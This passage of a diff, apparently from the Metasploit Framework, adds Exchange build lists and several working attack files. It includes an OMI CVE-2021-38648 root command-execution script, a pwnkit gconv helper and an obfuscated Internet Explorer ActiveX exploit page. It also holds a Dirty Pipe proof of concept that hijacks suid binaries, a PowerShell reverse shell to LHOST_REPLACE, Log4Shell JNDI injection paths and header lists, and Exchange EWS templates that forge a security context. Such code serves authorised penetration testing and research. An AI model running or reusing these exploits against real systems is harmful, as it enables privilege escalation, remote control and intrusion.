"14.3.123.4",
"14.2.390.3",
"14.2.375.0",
"14.2.342.3",
"14.2.328.10",
"14.3.328.5",
"14.2.318.4",
"14.2.318.2",
"14.2.309.2",
"14.2.298.4",
"14.2.283.3",
"14.2.247.5",
"14.1.438.0",
"14.1.421.3",
"14.1.421.2",
"14.1.421.0",
"14.1.355.2",
"14.1.339.1",
"14.1.323.6",
"14.1.289.7",
"14.1.270.1",
"14.1.255.2",
"14.1.218.15",
"14.0.726.0",
"14.0.702.1",
"14.0.694.0",
"14.0.689.0",
"14.0.682.1",
"14.0.639.21"
],
"eol": true
},
{
"name": "Exchange Server 2013",
"builds": [
"15.0.1497.28",
"15.0.1497.26",
"15.0.1497.24",
"15.0.1497.23",
"15.0.1497.18",
"15.0.1497.15",
"15.0.1497.12",
"15.0.1497.2",
"15.0.1473.6",
"15.0.1473.3",
"15.0.1395.12",
"15.0.1395.4",
"15.0.1367.3",
"15.0.1365.1",
"15.0.1347.2",
"15.0.1320.4",
"15.0.1293.2",
"15.0.1263.5",
"15.0.1236.3",
"15.0.1210.3",
"15.0.1178.4",
"15.0.1156.6",
"15.0.1130.7",
"15.0.1104.5",
"15.0.1076.9",
"15.0.1044.25",
"15.0.995.29",
"15.0.913.22",
"15.0.847.64",
"15.0.847.32",
"15.0.775.38",
"15.0.712.24",
"15.0.620.29",
"15.0.516.32"
],
"eol": false
},
{
"name": "Exchange Server 2016",
"builds": [
"15.1.2375.18",
"15.1.2375.17",
"15.1.2375.12",
"15.1.2375.7",
"15.1.2308.21",
"15.1.2308.20",
"15.1.2308.15",
"15.1.2308.14",
"15.1.2308.8",
"15.1.2242.12",
"15.1.2242.10",
"15.1.2242.8",
"15.1.2242.4",
"15.1.2176.14",
"15.1.2176.12",
"15.1.2176.9",
"15.1.2176.2",
"15.1.2106.13",
"15.1.2106.2",
"15.1.2044.13",
"15.1.2044.4",
"15.1.1979.8",
"15.1.1979.3",
"15.1.1913.12",
"15.1.1913.5",
"15.1.1847.12",
"15.1.1847.3",
"15.1.1779.8",
"15.1.1779.2",
"15.1.1713.10",
"15.1.1713.5",
"15.1.1591.18",
"15.1.1591.10",
"15.1.1531.12",
"15.1.1531.3",
"15.1.1466.16",
"15.1.1466.3",
"15.1.1415.10",
"15.1.1415.2",
"15.1.1261.35",
"15.1.1034.26",
"15.1.845.34",
"15.1.669.32",
"15.1.544.27",
"15.1.466.34",
"15.1.396.30",
"15.1.225.42",
"15.1.225.16"
],
"eol": false
},
{
"name": "Exchange Server 2019",
"builds": [
"15.2.986.15",
"15.2.986.14",
"15.2.986.9",
"15.2.986.5",
"15.2.922.20",
"15.2.922.19",
"15.2.922.14",
"15.2.922.13",
"15.2.922.7",
"15.2.858.15",
"15.2.858.12",
"15.2.858.10",
"15.2.858.5",
"15.2.792.15",
"15.2.792.13",
"15.2.792.10",
"15.2.792.3",
"15.2.721.13",
"15.2.721.2",
"15.2.659.12",
"15.2.659.4",
"15.2.595.8",
"15.2.595.3",
"15.2.529.13",
"15.2.529.5",
"15.2.464.15",
"15.2.464.5",
"15.2.397.11",
"15.2.397.3",
"15.2.330.11",
"15.2.330.5",
"15.2.221.18",
"15.2.221.12",
"15.2.196.0"
],
"eol": false
}
]
}
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+31
View File
@@ -0,0 +1,31 @@
# CVE-2021-38648 Microsoft OMI Management Interface Authentication Bypass
This is an LPE exploit for CVE-2021-38648
## Usage
```
usage: cve_2021_38648.py [-h] [-s SOCKET_PATH] [--timeout TIMEOUT] command
positional arguments:
command the command to run
optional arguments:
-h, --help show this help message and exit
-s SOCKET_PATH, --socket SOCKET_PATH
socket file
--timeout TIMEOUT response timeout
```
The exploit will exit with a status of 0 on success. The command is limited to 256 characters in length due to the
hardcoded messages that are exchanged. To increase this, generate a new series of messages using the `strace` command
below, search for the second `writev` syscall and extract each `iovec` instance. There should be six in total, and the
first 4 bytes of each should be consistent.
The hardcoded messages were recovered using:
```
strace -v -s 5000 -f -xx -e trace=socket,connect,write,writev,close \
/opt/omi/bin/omicli iv root/scx { SCX_OperatingSystem } ExecuteShellCommand { command '...' timeout 0 }
```
It is important that the exploit wait on the socket for a response to be received. It doesn't need to be read, but the
socket needs to be kept open until either the server closes it or the response is received.
@@ -0,0 +1,38 @@
import argparse
import os
import select
import socket
import sys
def main():
parser = argparse.ArgumentParser(conflict_handler='resolve')
parser.add_argument('-s', '--socket', dest='socket_path', default='/var/opt/omi/run/omiserver.sock', help='socket file')
parser.add_argument('--timeout', default=5.0, type=int, help='response timeout')
parser.add_argument('command', help='the command to run')
arguments = parser.parse_args()
command = arguments.command.encode('ascii')
if len(command) > 256:
return os.EX_USAGE
command = command.ljust(256, b'\0')
sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
sock.connect(arguments.socket_path)
except Exception:
return os.EX_UNAVAILABLE
sock.send(b'\x2f\x7e\xa8\xb1\x08\x06\x01\0\0\0\0\0\x05\0\0\0\x88\x23\xb0' + b'\0' * 13 + b'\x90\x7a\xb0\0\0\0\0\0\xbc\0\0\0\0\0\0\0\x80\x76\xb0\0\0\0\0\0\x50\0\0\0\0\0\0\0\x10\x71\xb0\0\0\0\0\0\x50\x05\0\0\0\0\0\0\xf0\x30\xb0\0\0\0\0\0\x6c\x01\0\0\0\0\0\0\x60\x23\xb0\0\0\0\0\0\xf0\x03\0\0\0\0\0\0')
sock.send(b'\x57\x99\x2b\x46\x01\0\0\0\x0f\0\0\0\x5f\x4f\x4d\x49\x5f\x4f\x70\x74\x69\x6f\x6e\x53\x65\x74\0\0\0\0\0\0\x02\0\0\0\0\0\0\x40\x1e\0\0\0\x5f\x5f\x4d\x49\x5f\x4f\x50\x45\x52\x41\x54\x49\x4f\x4e\x4f\x50\x54\x49\x4f\x4e\x53\x5f\x43\x48\x41\x4e\x4e\x45\x4c\0\0\0\x15\0\0\0\x01\0\0\0\x03\0\0\0\0\0\0\0\x01\0\0\0\x02\0\0\0\0\0\0\0\x1e\0\0\0\x5f\x5f\x4d\x49\x5f\x4f\x50\x45\x52\x41\x54\x49\x4f\x4e\x4f\x50\x54\x49\x4f\x4e\x53\x5f\x54\x49\x4d\x45\x4f\x55\x54\0\0\0\x0c\0\0\0\x01' + b'\0' * 15 + b'\x01\0\0\0\x1e' + b'\0' * 19 + b'\xe3\x74\xf4\x76')
sock.send(b'\x60\xea\x6a\xb2\0\0\0\0\x01\0\0\0\0\0\0\0\xa0\x7b\x41\x68\xa9\x7f\0\0\xe8\x24\xb0' + b'\0' * 21 + b'\x60\x23\xb0\0\0\0\0\0\x20\x71\xb0' + b'\0' * 21)
sock.send(b'\x60\xea\x6a\xb2\0\0\0\0\x01\0\0\0\0\0\0\0\xa0\x7b\x41\x68\xa9\x7f\0\0\xe8\x24\xb0' + b'\0' * 21 + b'\x60\x23\xb0\0\0\0\0\0\x20\x71\xb0' + b'\0' * 21 + b'\x30\x27\xb0\0\0\0\0\0\x03\0\0\0\0\0\0\0\x01' + b'\0' * 35 + b'\x01\0\0\0\x1e' + b'\0' * 19 + b'\x01' + b'\0' * 1203)
sock.send(b'\x57\x99\x2b\x46\x02\0\0\0\x14\0\0\0\x53\x43\x58\x5f\x4f\x70\x65\x72\x61\x74\x69\x6e\x67\x53\x79\x73\x74\x65\x6d\0\0\0\0\0\x02\0\0\0\0\x10\0\x40\x08\0\0\0\x63\x6f\x6d\x6d\x61\x6e\x64\0\x0d\0\0\0\x01\0\0\0\x01\x01\0\0' + command + b'\0\0\0\0\0\x10\0\x40\x08\0\0\0\x74\x69\x6d\x65\x6f\x75\x74\0\x0d\0\0\0\x01\0\0\0\x02\0\0\0\x30\0\0\0\xe3\x74\xf4\x76')
sock.send(b'\xd0\x76\xb0\0\0\0\0\0\x70\x7a\xb0\0\0\0\0\0\x80\x7a\xb0\0\0\0\0\0\x02\0\0\0\0\0\0\0\xff\xff\xff\xff' + b'\0' * 20 + b'\x60\x23\xb0\0\0\0\0\0\x07\x10\0\0\x01\0\0\0\x03' + b'\0' * 23 + b'\x11\x27' + b'\0' * 142 + b'\x90\x76\xb0\0\0\0\0\0\x90\x7a\xb0\0\0\0\0\0\xbc\0\0\0\0\0\0\0\xa8\x24\xb0\0\0\0\0\0\xb8\x24\xb0\0\0\0\0\0\xd0\x24\xb0' + b'\0' * 13 + b'\xd8\x2a\xb0' + b'\0' * 13 + b'\xf0\x30\xb0\0\0\0\0\0\0\0\0\0\x6c\x01\0\0\x72\x6f\x6f\x74\x2f\x73\x63\x78\0\0\0\0\0\0\0\0\x45\x78\x65\x63\x75\x74\x65\x53\x68\x65\x6c\x6c\x43\x6f\x6d\x6d\x61\x6e\x64\0\0\0\0\0\x53\x43\x58\x5f\x4f\x70\x65\x72\x61\x74\x69\x6e\x67\x53\x79\x73\x74\x65\x6d\0\0\0\0\0\0\0\0\0\x0e\x74\x5f\0\x50\x25\xb0' + b'\0' * 21 + b'\x60\x25\xb0\0\0\0\0\0\x02\0\0\0\x90' + b'\0' * 51 + b'\xff\xff\xff\xff\xff\xff\xff\xff\x5f\x4f\x4d\x49\x5f\x4f\x70\x74\x69\x6f\x6e\x53\x65\x74\0\0\x60\x26\xb0\0\0\0\0\0\xc8\x26\xb0' + b'\0' * 248 + b'\x40\x1d\x6c\x5f\0\xa8\x26\xb0' + b'\0' * 17 + b'\x15' + b'\0' * 15 + b'\x40' + b'\0' * 27 + b'\x5f\x5f\x4d\x49\x5f\x4f\x50\x45\x52\x41\x54\x49\x4f\x4e\x4f\x50\x54\x49\x4f\x4e\x53\x5f\x43\x48\x41\x4e\x4e\x45\x4c\0\0\0\0\0\0\0\x1d\x74\x5f\0\x10\x27\xb0' + b'\0' * 17 + b'\x0c' + b'\0' * 15 + b'\x68' + b'\0' * 27 + b'\x5f\x5f\x4d\x49\x5f\x4f\x50\x45\x52\x41\x54\x49\x4f\x4e\x4f\x50\x54\x49\x4f\x4e\x53\x5f\x54\x49\x4d\x45\x4f\x55\x54\0\0\0\0\0\0\0\x01\0\0\0\x02' + b'\0' * 23)
select.select([sock], [], [], arguments.timeout)
sock.close()
return os.EX_OK
if __name__ == '__main__':
sys.exit(main())
@@ -0,0 +1,30 @@
import subprocess
import sys
import os
import shutil
from ctypes import cdll, c_char_p, POINTER
libc = cdll.LoadLibrary("libc.so.6")
libc.execve.argtypes = c_char_p,POINTER(c_char_p),POINTER(c_char_p)
polkit_bin = sys.argv[1].encode('latin-1')
payload_file = sys.argv[2]
random_string_1 = sys.argv[3]
random_string_2 = sys.argv[4]
file = open(random_string_1 + "/gconv-modules", 'w')
file.write("module UTF-8// " + random_string_2 + "// " + random_string_1 + " 2")
file.close()
argv = [None]
cmd = polkit_bin
env = [random_string_1.encode('latin-1')]
env.append(b"PATH=GCONV_PATH=.")
env.append(b"CHARSET=" + random_string_2.encode('latin-1'))
env.append(b"SHELL="+random_string_1.encode('latin-1'))
env.append(None)
cargv = (c_char_p * len(argv))(*argv)
cenvp = (c_char_p * len(env))(*env)
libc.execve(cmd, cargv, cenvp)
Binary file not shown.
@@ -0,0 +1,65 @@
function exploit() {
var x = window["document"];
var then = window["Document"]["prototype"]["createElement"];
var _0x4d7c02 = window["Document"]["prototype"]["write"];
var PL$22 = window["HTMLElement"]["prototype"]["appendChild"];
var opfilter = window["HTMLElement"]["prototype"]["removeChild"];
var range = then["call"](x, "iframe");
try {
PL$22["call"](x["body"], range);
} catch (errx) {
PL$22["call"](x["documentElement"], range);
}
var ACTIVEX = range["contentWindow"]["ActiveXObject"];
var view = new ACTIVEX("htmlfile");
range["contentDocument"]["open"]()["close"]();
try {
opfilter["call"](x["body"], range);
} catch (err) {
opfilter["call"](x["documentElement"], range);
}
view["open"]()["close"]();
var mappedObj = new (view["Script"]["ActiveXObject"])("htmlFile");
mappedObj["open"]()["close"]();
var TokenType = new (mappedObj["Script"]["ActiveXObject"])("htmlFile");
TokenType["open"]()["close"]();
var model = new (TokenType["Script"]["ActiveXObject"])("htmlFile");
model["open"]()["close"]();
var iedom = new ActiveXObject("htmlfile");
var rp_test = new ActiveXObject("htmlfile");
var wmp_test = new ActiveXObject("htmlfile");
var doc = new ActiveXObject("htmlfile");
var a = new ActiveXObject("htmlfile");
var fake = new ActiveXObject("htmlfile");
var errors = window["XMLHttpRequest"];
var $node = new errors;
var directiveProcessors = errors["prototype"]["open"];
var nodeTypeRender = errors["prototype"]["send"];
var newAttributes = window["setTimeout"];
directiveProcessors["call"]($node, "GET", "REPLACE_URI", ![]);
nodeTypeRender["call"]($node);
model["Script"]["document"]["write"]("<body>");
var PL$41 = then["call"](model["Script"]["document"], "object");
PL$41["setAttribute"]("codebase", "REPLACE_URI#version=5,0,0,0");
PL$41["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217");
PL$22["call"](model["Script"]["document"]["body"], PL$41);
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:123";
iedom["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/Low/REPLACE_INF";
rp_test["Script"]["location"] = ".cpl:../../../AppData/Local/Temp/REPLACE_INF";
wmp_test["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/Low/REPLACE_INF";
doc["Script"]["location"] = ".cpl:../../../../AppData/Local/Temp/REPLACE_INF";
a["Script"]["location"] = ".cpl:../../../../../Temp/Low/REPLACE_INF";
doc["Script"]["location"] = ".cpl:../../../../../Temp/REPLACE_INF";
doc["Script"]["location"] = ".cpl:../../Low/REPLACE_INF";
doc["Script"]["location"] = ".cpl:../../REPLACE_INF";
}
exploit();
Binary file not shown.
@@ -0,0 +1,23 @@
Authorization
Cache-Control
Cf-Connecting_ip
Client-Ip
Contact
Cookie
Forwarded-For-Ip
Forwarded-For
Forwarded
If-Modified-Since
Originating-Ip
Referer
True-Client-Ip
User-Agent
X-Api-Version
X-Client-Ip
X-Forwarded-For
X-Leakix
X-Originating-Ip
X-Real-Ip
X-Remote-Addr
X-Remote-Ip
X-Wap-Profile
@@ -0,0 +1,6 @@
# Apache Struts2
/struts/utils.js
# Apache Solr
/solr/admin/cores?action=CREATE&wt=json&name=${jndi:uri}
# VMWare VCenter
/websso/SAML2/SSO/vsphere.local?SAMLRequest=
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+185
View File
@@ -0,0 +1,185 @@
/* SPDX-License-Identifier: GPL-2.0 */
/*
* Copyright 2022 CM4all GmbH / IONOS SE
*
* author: Max Kellermann <max.kellermann@ionos.com>
*
* Proof-of-concept exploit for the Dirty Pipe
* vulnerability (CVE-2022-0847) caused by an uninitialized
* "pipe_buffer.flags" variable. It demonstrates how to overwrite any
* file contents in the page cache, even if the file is not permitted
* to be written, immutable or on a read-only mount.
*
* This exploit requires Linux 5.8 or later; the code path was made
* reachable by commit f6dd975583bd ("pipe: merge
* anon_pipe_buf*_ops"). The commit did not introduce the bug, it was
* there before, it just provided an easy way to exploit it.
*
* There are two major limitations of this exploit: the offset cannot
* be on a page boundary (it needs to write one byte before the offset
* to add a reference to this page to the pipe), and the write cannot
* cross a page boundary.
*
* Example: ./write_anything /root/.ssh/authorized_keys 1 $'\nssh-ed25519 AAA......\n'
*
* Further explanation: https://dirtypipe.cm4all.com/
*/
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/user.h>
#include <stdint.h>
#include <sys/wait.h>
#ifndef PAGE_SIZE
#define PAGE_SIZE 0x1000
#endif
uint8_t payload_bytes[PAGE_SIZE-1] = "PAYLOAD_PLACEHOLDER";
/**
* Create a pipe where all "bufs" on the pipe_inode_info ring have the
* PIPE_BUF_FLAG_CAN_MERGE flag set.
*/
static void prepare_pipe(int p[2])
{
if (pipe(p)) abort();
const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
static char buffer[4096];
/* fill the pipe completely; each pipe_buffer will now have
the PIPE_BUF_FLAG_CAN_MERGE flag */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
write(p[1], buffer, n);
r -= n;
}
/* drain the pipe, freeing all pipe_buffer instances (but
leaving the flags initialized) */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(buffer) ? sizeof(buffer) : r;
read(p[0], buffer, n);
r -= n;
}
/* the pipe is now empty, and if somebody adds a new
pipe_buffer without initializing its "flags", the buffer
will be mergeable */
}
int hax(const char *filename, off_t offset, uint8_t *data, size_t len) {
/* open the input file and validate the specified offset */
const int fd = open(filename, O_RDONLY); // yes, read-only! :-)
if (fd < 0) {
perror("open failed");
return -1;
}
struct stat st;
if (fstat(fd, &st)) {
perror("stat failed");
return -1;
}
/* create the pipe with all flags initialized with
PIPE_BUF_FLAG_CAN_MERGE */
int p[2];
prepare_pipe(p);
/* splice one byte from before the specified offset into the
pipe; this will add a reference to the page cache, but
since copy_page_to_iter_pipe() does not initialize the
"flags", PIPE_BUF_FLAG_CAN_MERGE is still set */
--offset;
ssize_t nbytes = splice(fd, &offset, p[1], NULL, 1, 0);
if (nbytes < 0) {
perror("splice failed");
return -1;
}
if (nbytes == 0) {
fprintf(stderr, "short splice\n");
return -1;
}
/* the following write will not create a new pipe_buffer, but
will instead write into the page cache, because of the
PIPE_BUF_FLAG_CAN_MERGE flag */
nbytes = write(p[1], data, len);
if (nbytes < 0) {
perror("write failed");
return -1;
}
if ((size_t)nbytes < len) {
fprintf(stderr, "short write\n");
return -1;
}
close(fd);
return 0;
}
int main(int argc, char **argv) {
if (argc != 2) {
printf("Usage: %s suid_binary\n", argv[0]);
return EXIT_FAILURE;
}
int run_check = 0;
char * suid_binary = argv[1];
printf("[+] dirtypipe %s\n", suid_binary);
size_t payload_size = sizeof(payload_bytes);
if (payload_bytes[0] == 'P' &&
payload_bytes[1] == 'A' &&
payload_bytes[2] == 'Y' &&
payload_bytes[3] == 'L') {
payload_size = strlen(payload_bytes);
printf("[+] using dud payload...\n");
run_check = 1;
}
int fd = open(suid_binary, O_RDONLY);
uint8_t * orig_bytes = malloc(payload_size);
lseek(fd, 1, SEEK_SET);
read(fd, orig_bytes, payload_size);
close(fd);
printf("[+] hijacking suid binary...\n");
if (hax(suid_binary, 1, payload_bytes, payload_size) != 0) {
printf("[+] overwrite failed\n");
return EXIT_FAILURE;
}
if (run_check) {
return EXIT_SUCCESS;
}
printf("[+] running suid payload...\n");
pid_t pid = fork();
if (pid < 0) {
printf("[-] fork failed...\n");
} else if (pid > 0) {
int status;
waitpid(pid, &status, 0);
} else {
char *args[] = {suid_binary, NULL, NULL};
execve(args[0], args, NULL);
exit(EXIT_FAILURE);
return 0;
}
printf("[+] restoring suid binary...\n");
if (hax(suid_binary, 1, orig_bytes, payload_size) != 0) {
printf("[-] restore failed\n");
return EXIT_FAILURE;
}
return EXIT_SUCCESS;
}
+9
View File
@@ -0,0 +1,9 @@
MUSL_CROSS=../../../../mettle/build/tools/musl-cross/bin/
all:
$(MUSL_CROSS)x86_64-linux-musl-gcc -static CVE-2022-0847.c -o CVE-2022-0847-x64
$(MUSL_CROSS)i486-linux-musl-gcc -static CVE-2022-0847.c -o CVE-2022-0847-x86
$(MUSL_CROSS)aarch64-linux-musl-gcc -static CVE-2022-0847.c -o CVE-2022-0847-aarch64
$(MUSL_CROSS)armv5l-linux-musleabi-gcc -static CVE-2022-0847.c -o CVE-2022-0847-armle
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
+5
View File
@@ -0,0 +1,5 @@
dn: dc=metasploit,dc=com
objectClass: dcObject
objectClass: organization
o: Metasploit Framework
dc: metasploit
+5 -7
View File
@@ -1,5 +1,3 @@
# Powerfun - Written by Ben Turner & Dave Hardy
function Get-Webclient
{
$wc = New-Object -TypeName Net.WebClient
@@ -32,12 +30,12 @@ function powerfun
if ($Sslcon -eq "true")
{
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
$sslStream.AuthenticateAsClient("LHOST_REPLACE")
$sslStream.AuthenticateAsClient("LHOST_REPLACE",$null,"tls12",$false)
$stream = $sslStream
}
[byte[]]$bytes = 0..20000|%{0}
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
if ($Download -eq "true")
@@ -50,9 +48,6 @@ function powerfun
}
}
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
@@ -69,6 +64,9 @@ function powerfun
$stream.Flush()
}
$client.Close()
if ($listener)
{
$listener.Stop()
}
}
}
@@ -0,0 +1,121 @@
<%#
The default create_pipeline template wraps everything within an Invoke-Expression call, treating the command as a
string, but that doesn't work for the Exchange environment.
%>
<Obj RefId="0">
<MS>
<Obj N="PowerShell" RefId="1">
<MS>
<Obj N="Cmds" RefId="2">
<TN RefId="0">
<T>System.Collections.Generic.List`1[[System.Management.Automation.PSObject, System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]]</T>
<T>System.Object</T>
</TN>
<LST>
<Obj RefId="3">
<MS>
<S N="Cmd"><%= cmdlet.encode(xml: :text) %></S>
<B N="IsScript">false</B>
<Nil N="UseLocalScope" />
<Obj N="MergeMyResult" RefId="4">
<TN RefId="1">
<T>System.Management.Automation.Runspaces.PipelineResultTypes</T>
<T>System.Enum</T>
<T>System.ValueType</T>
<T>System.Object</T>
</TN>
<ToString>None</ToString>
<I32>0</I32>
</Obj>
<Obj N="MergeToResult" RefId="5">
<TNRef RefId="1" />
<ToString>None</ToString>
<I32>0</I32>
</Obj>
<Obj N="MergePreviousResults" RefId="6">
<TNRef RefId="1" />
<ToString>None</ToString>
<I32>0</I32>
</Obj>
<Obj N="MergeError" RefId="7">
<TNRef RefId="1" />
<ToString>None</ToString>
<I32>0</I32>
</Obj>
<Obj N="MergeWarning" RefId="8">
<TNRef RefId="1" />
<ToString>None</ToString>
<I32>0</I32>
</Obj>
<Obj N="MergeVerbose" RefId="9">
<TNRef RefId="1" />
<ToString>None</ToString>
<I32>0</I32>
</Obj>
<Obj N="MergeDebug" RefId="10">
<TNRef RefId="1" />
<ToString>None</ToString>
<I32>0</I32>
</Obj>
<Obj N="Args" RefId="11">
<TNRef RefId="0" />
<LST>
<% args.each_with_index do |arg, index| %>
<%# start indexing arguments at 100 to be above the index numbers used by everything else %>
<Obj RefId="<%= 100 + index %>">
<MS>
<S N="N"><%= arg[:name].encode(xml: :text) %></S>
<% if arg[:value].nil? %>
<Nil N="V" />
<% elsif arg[:value].is_a?(TrueClass) || arg[:value].is_a?(FalseClass) %>
<B N="V"><%= arg[:value].to_s %></B>
<% elsif arg[:value].is_a? String %>
<S N="V"><%= arg[:value].encode(xml: :text) %></S>
<% end %>
</MS>
</Obj>
<% end %>
</LST>
</Obj>
</MS>
</Obj>
</LST>
</Obj>
<B N="IsNested">false</B>
<Nil N="History" />
<B N="RedirectShellErrorOutputPipe">true</B>
</MS>
</Obj>
<B N="NoInput">true</B>
<Obj N="ApartmentState" RefId="23">
<TN RefId="2">
<T>System.Threading.ApartmentState</T>
<T>System.Enum</T>
<T>System.ValueType</T>
<T>System.Object</T>
</TN>
<ToString>Unknown</ToString>
<I32>2</I32>
</Obj>
<Obj N="RemoteStreamOptions" RefId="24">
<TN RefId="3">
<T>System.Management.Automation.RemoteStreamOptions</T>
<T>System.Enum</T>
<T>System.ValueType</T>
<T>System.Object</T>
</TN>
<ToString>0</ToString>
<I32>0</I32>
</Obj>
<B N="AddToHistory">true</B>
<Obj N="HostInfo" RefId="25">
<MS>
<B N="_isHostNull">true</B>
<B N="_isHostUINull">true</B>
<B N="_isHostRawUINull">true</B>
<B N="_useRunspaceHost">true</B>
</MS>
</Obj>
<B N="IsNested">false</B>
</MS>
</Obj>
@@ -0,0 +1,7 @@
<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress><%= email.encode(xml: :text) %></EMailAddress>
<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>
@@ -0,0 +1,41 @@
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
<t:SerializedSecurityContext>
<t:UserSid><%= user_sid.encode(xml: :text) %></t:UserSid>
<t:GroupSids>
<t:GroupIdentifier>
<t:SecurityIdentifier>S-1-5-21</t:SecurityIdentifier>
</t:GroupIdentifier>
</t:GroupSids>
</t:SerializedSecurityContext>
</soap:Header>
<soap:Body>
<m:CreateItem MessageDisposition="SaveOnly">
<m:Items>
<t:Message>
<t:Subject><%= subject.encode(xml: :text) %></t:Subject>
<!-- todo: make these fields totes legit -->
<t:Body BodyType="HTML"></t:Body>
<t:Attachments>
<t:FileAttachment>
<t:Name><%= file_name.encode(xml: :text) %></t:Name>
<t:IsInline>false</t:IsInline>
<t:IsContactPhoto>false</t:IsContactPhoto>
<t:Content><%= file_content.encode(xml: :text) %></t:Content>
</t:FileAttachment>
</t:Attachments>
<t:ToRecipients>
<t:Mailbox>
<t:EmailAddress><%= Faker::Internet.email.encode(xml: :text) %></t:EmailAddress>
</t:Mailbox>
</t:ToRecipients>
</t:Message>
</m:Items>
</m:CreateItem>
</soap:Body>
</soap:Envelope>
@@ -0,0 +1,14 @@
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
</soap:Header>
<soap:Body>
<m:ResolveNames ReturnFullContactData="true" SearchScope="ActiveDirectory">
<m:UnresolvedEntry>SMTP:</m:UnresolvedEntry>
</m:ResolveNames>
</soap:Body>
</soap:Envelope>
Binary file not shown.
+5
View File
@@ -340,6 +340,11 @@ typedef struct _GUID {
BYTE Data4[8];
} GUID;
typedef struct _LIST_ENTRY {
struct _LIST_ENTRY *Flink;
struct _LIST_ENTRY *Blink;
} LIST_ENTRY, *PLIST_ENTRY, PRLIST_ENTRY;
typedef VOID (CALLBACK *LPOVERLAPPED_COMPLETION_ROUTINE)(DWORD,DWORD,LPOVERLAPPED);
typedef enum _PROCESSINFOCLASS {
+2 -2
View File
@@ -17,7 +17,7 @@ static unsigned char alphabet[64] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopq
int base64decode(char *dest, const char *src, int l)
{
static char inalphabet[256], decoder[256];
static bool table_initialized = false;
static short table_initialized = 0;
int i, bits, c, char_count;
int rpos;
int wpos = 0;
@@ -27,7 +27,7 @@ int base64decode(char *dest, const char *src, int l)
inalphabet[alphabet[i]] = 1;
decoder[alphabet[i]] = i;
}
table_initialized = true;
table_initialized = 1;
}
char_count = 0;
+34 -40
View File
@@ -1,17 +1,22 @@
# This software is Copyright (c) 2012-2018 magnum, and it is hereby
# This software is Copyright (c) 2012-2020 magnum, and it is hereby
# released to the general public under the following terms:
# Redistribution and use in source and binary forms, with or without
# modification, are permitted.
#
# Generic implementation of "dumb" exhaustive search of Unicode BMP.
# Default is to try *all* allocated characters in the BMP of Unicode v11
# (there's 55,292 of them). Even if a fast format can exhaust two characters
# Default is to try *all* allocated characters in the BMP of Unicode v13
# (there's 55,387 of them). Even if a fast format can exhaust two characters
# in 15 minutes, three characters would take 1.5 years...
#
# Note that these modes will handle --max-len differently than normal: They
# will consider number of characters as opposed to number of bytes. This
# means you can naturally just use e.g. --max-len=3 for generating all
# three-character candidates (which may be up to 9 bytes each).
#
# Note that the (newer) cracking mode --subsets=full-unicode is way faster than
# this external mode, although not as easy to adapt to smaller portions of the
# Unicode space. See doc/SUBSETS
[List.External:Dumb16]
int maxlength; // Maximum password length to try
int last; // Last character position, zero-based
@@ -163,7 +168,7 @@ void init()
while (c <= 0x8b4) // ..to ARABIC LETTER KAF WITH DOT BELOW
charset[i++] = c++;
c = 0x8b6; // from ARABIC LETTER BEH WITH SMALL MEEM ABOVE
while (c <= 0x8bd) // ..to ARABIC LETTER AFRICAN NOON
while (c <= 0x8c7) // ..to ARABIC LETTER LAM WITH SMALL ARABIC LETTER TAH ABOVE
charset[i++] = c++;
c = 0x8d3; // from ARABIC SMALL LOW WAW
